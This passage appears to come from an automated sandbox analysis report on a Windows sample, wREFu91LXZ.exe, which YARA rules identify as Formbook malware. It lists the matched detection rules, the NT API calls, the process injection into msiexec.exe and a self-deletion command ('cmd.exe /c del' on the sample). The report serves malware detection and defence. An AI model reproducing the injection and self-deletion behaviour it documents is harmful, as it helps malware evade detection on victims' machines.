          Source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00418222 NtCreateFile,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B7B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B799D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B79A10 NtQuerySection,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B7A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A28280 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A283B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A28300 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A281D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A28222 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A283AA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0040102E
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00401030
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0041B8FB
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00408C6C
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00408C70
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0041B57A
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00402D88
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0041C58A
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00402D90
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B4B090
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00BF1002
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B54120
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B3F900
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_00B6EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043C841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04471002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043CB090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043B0D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_04481D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D4120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043BF900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043D6E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_043EEBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A2B8FB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A12FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A18C6C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A18C70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A2C58A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A12D88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A12D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_02A2B57A
          Source: wREFu91LXZ.exe, 00000001.00000003.227334681.000000000263F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wREFu91LXZ.exe
          Source: wREFu91LXZ.exe, 00000003.00000002.284453440.0000000000A4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs wREFu91LXZ.exe
          Source: wREFu91LXZ.exe, 00000003.00000002.284645298.0000000000C2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs wREFu91LXZ.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: wREFu91LXZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@12/7
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3728:120:WilError_01
          Source: wREFu91LXZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: wREFu91LXZ.exeVirustotal: Detection: 31%
          Source: wREFu91LXZ.exeReversingLabs: Detection: 53%
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeFile read: C:\Users\user\Desktop\wREFu91LXZ.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\wREFu91LXZ.exe 'C:\Users\user\Desktop\wREFu91LXZ.exe'
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeProcess created: C:\Users\user\Desktop\wREFu91LXZ.exe 'C:\Users\user\Desktop\wREFu91LXZ.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\wREFu91LXZ.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeProcess created: C:\Users\user\Desktop\wREFu91LXZ.exe 'C:\Users\user\Desktop\wREFu91LXZ.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\wREFu91LXZ.exe'
          Source: Binary string: msiexec.pdb source: wREFu91LXZ.exe, 00000003.00000002.284421615.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: wREFu91LXZ.exe, 00000003.00000002.284421615.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: wREFu91LXZ.exe, 00000001.00000003.226799711.0000000002330000.00000004.00000001.sdmp, wREFu91LXZ.exe, 00000003.00000002.284645298.0000000000C2F000.00000040.00000001.sdmp, msiexec.exe, 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: wREFu91LXZ.exe, msiexec.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeUnpacked PE file: 3.2.wREFu91LXZ.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_004062F6 pushfd ; ret
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_004153FC push eax; retf
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\wREFu91LXZ.exeCode function: 3_2_0041B412 push eax; ret
